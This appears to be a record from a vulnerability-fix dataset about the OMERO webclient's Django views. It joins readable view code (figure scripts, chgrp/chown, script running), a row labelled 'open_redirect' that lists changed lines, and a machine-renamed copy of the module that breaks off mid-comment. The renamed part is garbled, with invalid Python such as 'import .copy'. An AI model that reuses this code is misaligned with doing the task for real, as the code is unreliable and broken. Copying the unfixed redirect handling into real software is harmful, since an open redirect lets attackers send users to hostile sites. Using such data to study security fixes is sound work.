@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
    """
    Show a UI for running figure scripts.
    Supported scriptName values are 'SplitView', 'Thumbnail' and 'MakeMovie';
    input objects come from the GET parameters Image / Dataset / Well.
    """
    imageIds = request.GET.get("Image", None)  # comma - delimited list
    datasetIds = request.GET.get("Dataset", None)
    wellIds = request.GET.get("Well", None)
    if wellIds is not None:
        # Wells are resolved to their images (at the given field Index).
        wellIds = [long(i) for i in wellIds.split(",")]
        wells = conn.getObjects("Well", wellIds)
        wellIdx = getIntOrDefault(request, "Index", 0)
        imageIds = [str(w.getImage(wellIdx).getId()) for w in wells]
        imageIds = ",".join(imageIds)
    if imageIds is None and datasetIds is None:
        return HttpResponse(
            "Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
        )

    def validateIds(dtype, ids):
        # Keep only the ids the user can actually access; 404 if none remain.
        ints = [int(oid) for oid in ids.split(",")]
        validObjs = {}
        for obj in conn.getObjects(dtype, ints):
            validObjs[obj.id] = obj
        filteredIds = [iid for iid in ints if iid in validObjs.keys()]
        if len(filteredIds) == 0:
            raise Http404("No %ss found with IDs %s" % (dtype, ids))
        else:
            # Now we can specify group context - All should be same group
            gid = list(validObjs.values())[0].getDetails().group.id.val
            conn.SERVICE_OPTS.setOmeroGroup(gid)
        return filteredIds, validObjs

    context = {}
    if imageIds is not None:
        imageIds, validImages = validateIds("Image", imageIds)
        context["idString"] = ",".join([str(i) for i in imageIds])
        context["dtype"] = "Image"
    if datasetIds is not None:
        datasetIds, validDatasets = validateIds("Dataset", datasetIds)
        context["idString"] = ",".join([str(i) for i in datasetIds])
        context["dtype"] = "Dataset"
    if scriptName == "SplitView":
        scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
        template = "webclient/scripts/split_view_figure.html"
        # Lookup Tags & Datasets (for row labels)
        imgDict = []  # A list of data about each image.
        for iId in imageIds:
            data = {"id": iId}
            img = validImages[iId]
            data["name"] = img.getName()
            tags = [
                ann.getTextValue()
                for ann in img.listAnnotations()
                if ann._obj.__class__ == omero.model.TagAnnotationI
            ]
            data["tags"] = tags
            data["datasets"] = [d.getName() for d in img.listParents()]
            imgDict.append(data)
        # Use the first image as a reference
        image = validImages[imageIds[0]]
        context["imgDict"] = imgDict
        context["image"] = image
        context["channels"] = image.getChannels()
    elif scriptName == "Thumbnail":
        scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
        template = "webclient/scripts/thumbnail_figure.html"

        def loadImageTags(imageIds):
            # Collect the Tag annotations per image in a single query.
            tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
            linkMap = {}  # group tags. {imageId: [tags]}
            tagMap = {}
            for iId in imageIds:
                linkMap[iId] = []
            for link in tagLinks:
                c = link.getChild()
                if c._obj.__class__ == omero.model.TagAnnotationI:
                    tagMap[c.id] = c
                    linkMap[link.getParent().id].append(c)
            imageTags = []
            for iId in imageIds:
                imageTags.append({"id": iId, "tags": linkMap[iId]})
            tags = []
            for tId, t in tagMap.items():
                tags.append(t)
            return imageTags, tags

        thumbSets = []  # multiple collections of images
        tags = []
        figureName = "Thumbnail_Figure"
        if datasetIds is not None:
            for d in conn.getObjects("Dataset", datasetIds):
                imgIds = [i.id for i in d.listChildren()]
                imageTags, ts = loadImageTags(imgIds)
                thumbSets.append({"name": d.getName(), "imageTags": imageTags})
                tags.extend(ts)
            figureName = thumbSets[0]["name"]
        else:
            imageTags, ts = loadImageTags(imageIds)
            thumbSets.append({"name": "images", "imageTags": imageTags})
            tags.extend(ts)
            parent = conn.getObject("Image", imageIds[0]).getParent()
            figureName = parent.getName() or "Thumbnail Figure"
            context["parent_id"] = parent.getId()
        uniqueTagIds = set()  # remove duplicates
        uniqueTags = []
        for t in tags:
            if t.id not in uniqueTagIds:
                uniqueTags.append(t)
                uniqueTagIds.add(t.id)
        uniqueTags.sort(key=lambda x: x.getTextValue().lower())
        context["thumbSets"] = thumbSets
        context["tags"] = uniqueTags
        context["figureName"] = figureName.replace(" ", "_")
    elif scriptName == "MakeMovie":
        scriptPath = "/omero/export_scripts/Make_Movie.py"
        template = "webclient/scripts/make_movie.html"
        # expect to run on a single image at a time
        image = conn.getObject("Image", imageIds[0])
        # remove extension (if 3 chars or less)
        movieName = image.getName().rsplit(".", 1)
        if len(movieName) > 1 and len(movieName[1]) > 3:
            movieName = ".".join(movieName)
        else:
            movieName = movieName[0]
        # make sure name is not a path
        context["movieName"] = os.path.basename(movieName)
        chs = []
        for c in image.getChannels():
            chs.append(
                {
                    "active": c.isActive(),
                    "color": c.getColor().getHtml(),
                    "label": c.getLabel(),
                }
            )
        context["channels"] = chs
        context["sizeT"] = image.getSizeT()
        context["sizeZ"] = image.getSizeZ()
    scriptService = conn.getScriptService()
    scriptId = scriptService.getScriptID(scriptPath)
    if scriptId < 0:
        raise AttributeError("No script found for path '%s'" % scriptPath)
    context["template"] = template
    context["scriptId"] = scriptId
    return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
    """
    Check whether the Images / Datasets etc. in the request contain partial
    multi-image filesets. Used by the chgrp and delete dialogs to test
    whether the requested 'action' can be performed.
    """
    requested_ids = {}
    for dtype in ("Image", "Dataset", "Project"):
        id_csv = request.GET.get(dtype, None)
        if id_csv is not None:
            requested_ids[dtype] = [int(i) for i in id_csv.split(",")]
    split_filesets = conn.getContainerService().getImagesBySplitFilesets(
        requested_ids, None, conn.SERVICE_OPTS
    )
    # For each split fileset, report which images were part of the request
    # (True key) and which sibling images would block the action (False key).
    splits = [
        {
            "id": fs_id,
            "attempted_iids": included[True],
            "blocking_iids": included[False],
        }
        for fs_id, included in split_filesets.items()
    ]
    return {
        "split_filesets": splits,
        # The UI uses 'move' rather than 'chgrp'.
        "action": "move" if action == "chgrp" else action,
        "template": "webclient/activities/fileset_check_dialog_content.html",
    }
def getAllObjects(
    conn, project_ids, dataset_ids, image_ids, screen_ids, plate_ids, experimenter_id
):
    """
    Given a list of containers and images, calculate all the descendants
    and necessary siblings (for any filesets).

    Returns a dict with two keys:
    - 'remove': per-type lists of every object id that will change group
    - 'childless': containers left with no children ('project'/'dataset'
      lists plus an 'orphaned' flag for the orphaned-images directory)
    NOTE(review): experimenter_id is not used anywhere in this function -
    confirm whether per-user orphan handling was intended.
    """
    # TODO Handle None inputs, maybe add defaults
    params = omero.sys.ParametersI()
    qs = conn.getQueryService()
    project_ids = set(project_ids)
    dataset_ids = set(dataset_ids)
    image_ids = set(image_ids)
    fileset_ids = set([])
    plate_ids = set(plate_ids)
    screen_ids = set(screen_ids)
    # Get any datasets for projects
    if project_ids:
        params.map = {}
        params.map["pids"] = rlist([rlong(x) for x in list(project_ids)])
        q = """
            select pdlink.child.id
            from ProjectDatasetLink pdlink
            where pdlink.parent.id in (:pids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            dataset_ids.add(e[0].val)
    # Get any plates for screens
    if screen_ids:
        params.map = {}
        params.map["sids"] = rlist([rlong(x) for x in screen_ids])
        q = """
            select splink.child.id
            from ScreenPlateLink splink
            where splink.parent.id in (:sids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            plate_ids.add(e[0].val)
    # Get any images for datasets
    if dataset_ids:
        params.map = {}
        params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
        q = """
            select dilink.child.id,
                   dilink.child.fileset.id
            from DatasetImageLink dilink
            where dilink.parent.id in (:dids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
            # Some images in Dataset may not have fileset
            if e[1] is not None:
                fileset_ids.add(e[1].val)
    # Get any images for plates
    # TODO Seemed no need to add the filesets for plates as it isn't possible
    # to link it from outside of its plate. This may be true for the client,
    # but it certainly isn't true for the model so maybe allow this to also get
    # filesets
    if plate_ids:
        params.map = {}
        params.map["plids"] = rlist([rlong(x) for x in plate_ids])
        q = """
            select ws.image.id
            from WellSample ws
            join ws.plateAcquisition pa
            where pa.plate.id in (:plids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
    # Get any extra images due to filesets
    if fileset_ids:
        params.map = {}
        params.map["fsids"] = rlist([rlong(x) for x in fileset_ids])
        q = """
            select image.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.fileset.id in (select fs.id
                                       from Image im
                                       join im.fileset fs
                                       where fs.id in (:fsids)
                                       group by fs.id
                                       having count(im.id)>1)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
    # Get any additional datasets that may need updating as their children have
    # been snatched.
    # TODO Need to differentiate which orphaned directories need refreshing
    extra_dataset_ids = set([])
    extra_orphaned = False
    if image_ids:
        params.map = {
            "iids": rlist([rlong(x) for x in image_ids]),
        }
        exclude_datasets = ""
        if dataset_ids:
            params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
            # Make sure to allow parentless results as well as those
            # that do not match a dataset being removed
            exclude_datasets = """
                and (
                    dilink.parent.id not in (:dids)
                    or dilink.parent.id = null
                )
                """
        q = (
            """
            select distinct dilink.parent.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.id in (:iids)
            %s
            and (select count(dilink2.child.id)
                 from DatasetImageLink dilink2
                 where dilink2.parent.id = dilink.parent.id
                 and dilink2.child.id not in (:iids)) = 0
            """
            % exclude_datasets
        )
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            if e:
                extra_dataset_ids.add(e[0].val)
            else:
                # A null parent means orphaned images are affected.
                extra_orphaned = True
    # Get any additional projects that may need updating as their children have
    # been snatched. There is no need to check for orphans because if a dataset
    # is being removed from somewhere else, it can not exist as an orphan.
    extra_project_ids = set([])
    if dataset_ids:
        params.map = {"dids": rlist([rlong(x) for x in dataset_ids])}
        exclude_projects = ""
        if project_ids:
            params.map["pids"] = rlist([rlong(x) for x in project_ids])
            exclude_projects = "and pdlink.parent.id not in (:pids)"
        q = (
            """
            select distinct pdlink.parent.id
            from ProjectDatasetLink pdlink
            where pdlink.child.id in (:dids)
            %s
            and (select count(pdlink2.child.id)
                 from ProjectDatasetLink pdlink2
                 where pdlink2.parent.id = pdlink.parent.id
                 and pdlink2.child.id not in (:dids)) = 0
            """
            % exclude_projects
        )
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            extra_project_ids.add(e[0].val)
    # We now have the complete list of objects that will change group
    # We also have an additional list of datasets/projects that may have had
    # snatched children and thus may need updating in the client if the
    # dataset/project has gone from N to 0 children
    result = {
        # These objects are completely removed
        "remove": {
            "project": list(project_ids),
            "dataset": list(dataset_ids),
            "screen": list(screen_ids),
            "plate": list(plate_ids),
            "image": list(image_ids),
        },
        # These objects now have no children
        "childless": {
            "project": list(extra_project_ids),
            "dataset": list(extra_dataset_ids),
            "orphaned": extra_orphaned,
        },
    }
    return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
    """Thin wrapper submitting a chgrp dry-run via dryRun()."""
    return dryRun(request, "chgrp", conn=conn, **kwargs)
@require_POST
@login_required()
def dryRun(request, action, conn=None, **kwargs):
    """Submit a chgrp or chown dry-run and return its job id as the response body."""
    target_objects = {}
    for dtype in ("Project", "Dataset", "Image", "Screen", "Plate", "Fileset"):
        id_csv = request.POST.get(dtype, None)
        if id_csv is not None:
            target_objects[dtype] = [int(oid) for oid in id_csv.split(",")]
    # The target is a group for chgrp, an owner for chown.
    if action == "chgrp":
        target_id = getIntOrDefault(request, "group_id", None)
    elif action == "chown":
        target_id = getIntOrDefault(request, "owner_id", None)
    handle = conn.submitDryRun(action, target_objects, target_id)
    return HttpResponse(str(handle))
@login_required()
def chgrp(request, conn=None, **kwargs):
    """
    Moves data to a new group, using the chgrp queue.
    Handles submission of chgrp form: all data in POST.
    Adds the callback handle to the request.session['callback']['jobId'].
    Returns JSON describing the objects the client should visually update.
    """
    if not request.method == "POST":
        return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
    # Get the target group_id
    group_id = getIntOrDefault(request, "group_id", None)
    if group_id is None:
        return JsonResponse({"Error": "chgrp: No group_id specified"})
    group_id = long(group_id)

    def getObjectOwnerId(r):
        # Owner of the first Dataset/Image/Plate found in the POST data.
        for t in ["Dataset", "Image", "Plate"]:
            ids = r.POST.get(t, None)
            if ids is not None:
                for o in list(conn.getObjects(t, ids.split(","))):
                    return o.getDetails().owner.id.val

    group = conn.getObject("ExperimenterGroup", group_id)
    new_container_name = request.POST.get("new_container_name", None)
    new_container_type = request.POST.get("new_container_type", None)
    container_id = None
    # Context must be set to owner of data, E.g. to create links.
    ownerId = getObjectOwnerId(request)
    conn.SERVICE_OPTS.setOmeroUser(ownerId)
    if (
        new_container_name is not None
        and len(new_container_name) > 0
        and new_container_type is not None
    ):
        conn.SERVICE_OPTS.setOmeroGroup(group_id)
        container_id = conn.createContainer(new_container_type, new_container_name)
    # No new container, check if target is specified
    if container_id is None:
        # E.g. "dataset-234"
        target_id = request.POST.get("target_id", None)
        container_id = target_id is not None and target_id.split("-")[1] or None
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
    for dtype in dtypes:
        # Get all requested objects of this type
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            # TODO Doesn't the filesets only apply to images?
            # if 'filesets' are specified, make sure we move ALL Fileset Images
            fsIds = request.POST.getlist("fileset")
            if len(fsIds) > 0:
                # If a dataset is being moved and there is a split fileset
                # then those images need to go somewhere in the new
                if dtype == "Dataset":
                    conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
                else:
                    for fs in conn.getObjects("Fileset", fsIds):
                        obj_ids.extend([i.id for i in fs.copyImages()])
                    obj_ids = list(set(obj_ids))  # remove duplicates
            logger.debug("chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
            handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
            jobId = str(handle)
            # Record the job so the Activities window can poll its progress.
            request.session["callback"][jobId] = {
                "job_type": "chgrp",
                "group": group.getName(),
                "to_group_id": group_id,
                "dtype": dtype,
                "obj_ids": obj_ids,
                "job_name": "Change group",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            request.session.modified = True
    # Update contains a list of images/containers that need to be
    # updated.
    project_ids = request.POST.get("Project", [])
    dataset_ids = request.POST.get("Dataset", [])
    image_ids = request.POST.get("Image", [])
    screen_ids = request.POST.get("Screen", [])
    plate_ids = request.POST.get("Plate", [])
    if project_ids:
        project_ids = [long(x) for x in project_ids.split(",")]
    if dataset_ids:
        dataset_ids = [long(x) for x in dataset_ids.split(",")]
    if image_ids:
        image_ids = [long(x) for x in image_ids.split(",")]
    if screen_ids:
        screen_ids = [long(x) for x in screen_ids.split(",")]
    if plate_ids:
        plate_ids = [long(x) for x in plate_ids.split(",")]
    # TODO Change this user_id to be an experimenter_id in the request as it
    # is possible that a user is chgrping data from another user so it is
    # that users orphaned that will need updating. Or maybe all orphaned
    # directories could potentially need updating?
    # Create a list of objects that have been changed by this operation. This
    # can be used by the client to visually update.
    update = getAllObjects(
        conn,
        project_ids,
        dataset_ids,
        image_ids,
        screen_ids,
        plate_ids,
        request.session.get("user_id"),
    )
    # return HttpResponse("OK")
    return JsonResponse({"update": update})
@login_required()
def chown(request, conn=None, **kwargs):
    """
    Moves data to a new owner, using the chown queue.
    Handles submission of chown form: all data in POST.
    Adds the callback handle to the request.session['callback']['jobId']
    and returns JSON with the list of submitted job ids.
    """
    if not request.method == "POST":
        return JsonResponse({"Error": "Need to POST to chown"}, status=405)
    # Get the target owner_id
    owner_id = getIntOrDefault(request, "owner_id", None)
    if owner_id is None:
        return JsonResponse({"Error": "chown: No owner_id specified"})
    owner_id = int(owner_id)
    exp = conn.getObject("Experimenter", owner_id)
    if exp is None:
        # Bug fix: the original format string had no %s placeholder, so the
        # '%' operation raised TypeError instead of returning this response.
        return JsonResponse({"Error": "chown: Experimenter %s not found" % owner_id})
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
    jobIds = []
    for dtype in dtypes:
        # Get all requested objects of this type
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            logger.debug("chown to owner:%s %s-%s" % (owner_id, dtype, obj_ids))
            handle = conn.chownObjects(dtype, obj_ids, owner_id)
            jobId = str(handle)
            jobIds.append(jobId)
            # Record the job so the Activities window can poll its progress.
            request.session["callback"][jobId] = {
                "job_type": "chown",
                "owner": exp.getFullName(),
                "to_owner_id": owner_id,
                "dtype": dtype,
                "obj_ids": obj_ids,
                "job_name": "Change owner",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            request.session.modified = True
    return JsonResponse({"jobIds": jobIds})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
    """
    Runs a script using values in a POST.

    Builds an inputMap from the script's declared parameters and the POST
    data, then delegates to run_script(), which registers the job in
    request.session['callback'] for the Activities panel.
    """
    scriptService = conn.getScriptService()
    inputMap = {}
    sId = long(scriptId)
    try:
        params = scriptService.getParams(sId)
    except Exception as x:
        # handle python 2 or 3 errors (py3 exceptions have no .message)
        message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
        if message and message.startswith("No processor available"):
            # Delegate to run_script() for handling 'No processor available'
            rsp = run_script(request, conn, sId, inputMap, scriptName="Script")
            return JsonResponse(rsp)
        else:
            raise
    # NB: no need to call getParams() a second time - 'params' from the
    # try block above is already valid (the original made a redundant call).
    scriptName = params.name.replace("_", " ").replace(".py", "")

    logger.debug("Script: run with request.POST: %s" % request.POST)

    # upload new file
    fileupload = (
        "file_annotation" in request.FILES and request.FILES["file_annotation"] or None
    )
    fileAnnId = None
    if fileupload is not None and fileupload != "":
        manager = BaseContainer(conn)
        fileAnnId = manager.createFileAnnotations(fileupload, [])

    for key, param in params.inputs.items():
        prototype = param.prototype
        pclass = prototype.__class__

        if key == "File_Annotation" and fileAnnId is not None:
            inputMap[key] = pclass(str(fileAnnId))
            continue

        # handle bool separately, since unchecked checkbox will not be in
        # request.POST
        if pclass == omero.rtypes.RBoolI:
            value = key in request.POST
            inputMap[key] = pclass(value)
            continue

        if pclass.__name__ == "RMapI":
            # Gather key/value pairs from rows of form fields named
            # <key>_key0/<key>_value0, <key>_key1/<key>_value1, ...
            keyName = "%s_key0" % key
            valueName = "%s_value0" % key
            row = 0
            paramMap = {}
            while keyName in request.POST:
                # the key and value don't have any data-type defined by
                # scripts - just use string
                k = str(request.POST[keyName])
                v = request.POST[valueName]
                if len(k) > 0 and len(v) > 0:
                    paramMap[str(k)] = v
                row += 1
                keyName = "%s_key%d" % (key, row)
                valueName = "%s_value%d" % (key, row)
            if len(paramMap) > 0:
                inputMap[key] = wrap(paramMap)
            continue

        if key in request.POST:
            if pclass == omero.rtypes.RListI:
                values = request.POST.getlist(key)
                if len(values) == 0:
                    continue
                if len(values) == 1:  # process comma-separated list
                    if len(values[0]) == 0:
                        continue
                    values = values[0].split(",")

                # try to determine 'type' of values in our list
                listClass = omero.rtypes.RStringI
                pval = prototype.val  # list
                # check if a value type has been set (first item of prototype
                # list)
                if len(pval) > 0:
                    listClass = pval[0].__class__
                    if listClass == int(1).__class__:
                        listClass = omero.rtypes.rint
                    if listClass == long(1).__class__:
                        listClass = omero.rtypes.rlong

                # construct our list, using appropriate 'type'
                valueList = []
                for v in values:
                    try:
                        # RStringI() will encode any unicode
                        obj = listClass(v.strip())
                    except Exception:
                        logger.debug("Invalid entry for '%s' : %s" % (key, v))
                        continue
                    if isinstance(obj, omero.model.IObject):
                        valueList.append(omero.rtypes.robject(obj))
                    else:
                        valueList.append(obj)
                inputMap[key] = omero.rtypes.rlist(valueList)

            # Handle other rtypes: String, Long, Int etc.
            else:
                value = request.POST[key]
                if len(value) == 0:
                    continue
                try:
                    inputMap[key] = pclass(value)
                except Exception:
                    logger.debug("Invalid entry for '%s' : %s" % (key, value))
                    continue

    # If we have objects specified via 'IDs' and 'DataType', try to pick
    # correct group
    if "IDs" in inputMap and "Data_Type" in inputMap:
        gid = conn.SERVICE_OPTS.getOmeroGroup()
        conn.SERVICE_OPTS.setOmeroGroup("-1")
        try:
            firstObj = conn.getObject(
                inputMap["Data_Type"].val, unwrap(inputMap["IDs"])[0]
            )
            newGid = firstObj.getDetails().group.id.val
            conn.SERVICE_OPTS.setOmeroGroup(newGid)
        except Exception:
            logger.debug(traceback.format_exc())
            # if inputMap values not as expected or firstObj is None
            conn.SERVICE_OPTS.setOmeroGroup(gid)

    try:
        # Try/except in case inputs are not serializable, e.g. unicode
        logger.debug("Running script %s with " "params %s" % (scriptName, inputMap))
    except Exception:
        pass
    rsp = run_script(request, conn, sId, inputMap, scriptName)
    return JsonResponse(rsp)
@login_required(isAdmin=True)
@render_response()
def script_upload(request, conn=None, **kwargs):
    """Script upload UI: GET renders the form, POST uploads or replaces."""
    if request.method != "POST":
        # GET simply shows the upload form
        return {"template": "webclient/scripts/upload_script.html"}

    # Read the uploaded file's text and build the full target path
    upload = request.FILES["script_file"]
    upload.seek(0)
    text = upload.read().decode("utf-8")
    path = request.POST.get("script_path")
    if not path.endswith("/"):
        path += "/"
    path += upload.name

    # Replace any script already at this path, otherwise upload a new one
    scriptService = conn.getScriptService()
    script_id = scriptService.getScriptID(path)
    try:
        if script_id > 0:
            scriptService.editScript(OriginalFileI(script_id, False), text)
            message = "Script Replaced: %s" % upload.name
        else:
            script_id = scriptService.uploadOfficialScript(path, text)
            message = "Script Uploaded: %s" % upload.name
    except omero.ValidationException as ex:
        message = str(ex)
    return {"Message": message, "script_id": script_id}
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
    """
    Uses the scripting service (Batch Image Export script) to generate
    OME-TIFF for an image and attach this as a file annotation to the image.
    Script will show up in the 'Activities' for users to monitor and download
    result etc.
    """
    scriptService = conn.getScriptService()
    sId = scriptService.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
    image = conn.getObject("Image", imageId)
    if image is not None:
        # run the script within the image's own group
        conn.SERVICE_OPTS.setOmeroGroup(image.getDetails().group.id.val)
    inputMap = {
        "Data_Type": wrap("Image"),
        "IDs": rlist([rlong(long(imageId))]),
        "Format": wrap("OME-TIFF"),
    }
    rsp = run_script(request, conn, sId, inputMap, scriptName="Create OME-TIFF")
    return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName="Script"):
    """
    Starts running a script, adding details to the request.session so that it
    shows up in the webclient Activities panel and results are available there
    etc.

    Returns {"jobId": ..., "status": ...} when the script is launched, or
    {"status": ..., "error": ...} when launching fails.
    """
    request.session.modified = True
    scriptService = conn.getScriptService()
    try:
        handle = scriptService.runScript(sId, inputMap, None, conn.SERVICE_OPTS)
        # E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154 # noqa
        jobId = str(handle)
        status = "in progress"
        request.session["callback"][jobId] = {
            "job_type": "script",
            "job_name": scriptName,
            "start_time": datetime.datetime.now(),
            "status": status,
        }
        request.session.modified = True
    except Exception as x:
        jobId = str(time())  # E.g. 1312803670.6076391
        # handle python 2 or 3 errors (py3 exceptions have no .message)
        message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
        if message and message.startswith("No processor available"):
            # omero.ResourceError
            logger.info(traceback.format_exc())
            error = "No Processor Available"
            status = "no processor available"
            message = ""  # template displays message and link
        else:
            logger.error(traceback.format_exc())
            error = traceback.format_exc()
            status = "failed"
            # NB: 'message' already holds the py2/py3-safe text extracted
            # above; re-reading x.message here (as the original did) raises
            # AttributeError on Python 3.
        # save the error to http session, for display in 'Activities' window
        request.session["callback"][jobId] = {
            "job_type": "script",
            "job_name": scriptName,
            "start_time": datetime.datetime.now(),
            "status": status,
            "Message": message,
            "error": error,
        }
        return {"status": status, "error": error}
    return {"jobId": jobId, "status": status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
    """
    Query to see if we have an OME-TIFF attached to the image (assume only 1,
    since Batch Image Export will delete old ones)
    """
    # Any existing OME-TIFF annotation links on this image
    links = list(
        conn.getAnnotationLinks(
            "Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF
        )
    )
    if not links:
        return {}  # will get returned as json by default
    # highest link ID === most recent export
    newest = max(links, key=lambda lnk: lnk.getId())
    created = newest.creationEventDate()
    annId = newest.getChild().getId()

    from omeroweb.webgateway.templatetags.common_filters import ago

    return {
        "created": str(created),
        "ago": ago(created),
        "id": annId,
        "download": reverse("download_annotation", args=[annId]),
    }  # will get returned as json by default
| open_redirect | {
"code": [
"from .forms import ShareForm, BasketShareForm",
" elif action == \"add\":",
" template = \"webclient/public/share_form.html\"",
" experimenters = list(conn.getExperimenters())",
" experimenters.sort(key=lambda x: x.getOmeName().lower())",
" if o_type == \"share\":",
" img_ids = request.GET.getlist(\"image\", request.POST.getlist(\"image\"))",
" if request.method == \"GET\" and len(img_ids) == 0:",
" return HttpResponse(\"No images specified\")",
" images_to_share = list(conn.getObjects(\"Image\", img_ids))",
" if request.method == \"POST\":",
" form = BasketShareForm(",
" initial={\"experimenters\": experimenters, \"images\": images_to_share},",
" data=request.POST.copy(),",
" )",
" if form.is_valid():",
" images = form.cleaned_data[\"image\"]",
" message = form.cleaned_data[\"message\"]",
" expiration = form.cleaned_data[\"expiration\"]",
" members = form.cleaned_data[\"members\"]",
" enable = form.cleaned_data[\"enable\"]",
" host = \"%s?server=%i\" % (",
" request.build_absolute_uri(",
" reverse(\"load_template\", args=[\"public\"])",
" ),",
" int(conn.server_id),",
" )",
" shareId = manager.createShare(",
" host, images, message, members, enable, expiration",
" )",
" return HttpResponse(\"shareId:%s\" % shareId)",
" else:",
" initial = {",
" \"experimenters\": experimenters,",
" \"images\": images_to_share,",
" \"enable\": True,",
" \"selected\": request.GET.getlist(\"image\"),",
" }",
" form = BasketShareForm(initial=initial)",
" template = \"webclient/public/share_form.html\"",
" context = {\"manager\": manager, \"form\": form}"
],
"line_no": [
70,
2874,
2875,
2876,
2877,
2878,
2879,
2880,
2881,
2882,
2883,
2884,
2885,
2886,
2887,
2888,
2889,
2890,
2891,
2892,
2894,
2895,
2896,
2897,
2898,
2899,
2900,
2901,
2902,
2903,
2904,
2905,
2906,
2907,
2908,
2909,
2910,
2911,
2912,
2913,
2914
]
} | {
"code": [
"from .forms import ShareForm",
" \"\"\"",
" If url is a different host, not in settings.REDIRECT_ALLOWED_HOSTS",
" we return webclient index URL.",
" \"\"\"",
" if not is_safe_url(url, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):",
" return url",
" else:",
" url = validate_redirect_url(url)",
" url = validate_redirect_url(url)"
],
"line_no": [
71,
181,
183,
184,
185,
186,
188,
272,
273,
352
]
} |
import .copy
import os
import .datetime
import Ice
from Ice import Exception as IceException
import logging
import .traceback
import json
import .re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from time import .time
from omeroweb.version import .omeroweb_buildyear as build_year
from omeroweb.version import .omeroweb_version as omero_version
import .omero
import .omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import .toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import .urlencode
from django.core.urlresolvers import .reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import .never_cache
from django.views.decorators.http import .require_POST
from django.shortcuts import .render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm, BasketShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import .views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import .get_longs as webgateway_get_longs
from omeroweb.feedback.views import .handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import .render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import .getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import .tree
try:
import .long
except ImportError:
VAR_241 = int
VAR_0 = logging.getLogger(__name__)
VAR_0.info("INIT '%s'" % os.getpid())
VAR_1 = settings.PAGE * 100
def FUNC_0(VAR_2, VAR_3, VAR_4):
    # Read GET parameter VAR_3 from request VAR_2, defaulting to VAR_4.
    # A non-None value is coerced via VAR_241 (long, or int on Python 3 -
    # see the try/except shim above). Returns None if the param is absent
    # and VAR_4 is None.
    # NOTE(review): identifiers look machine-renamed; appears to mirror
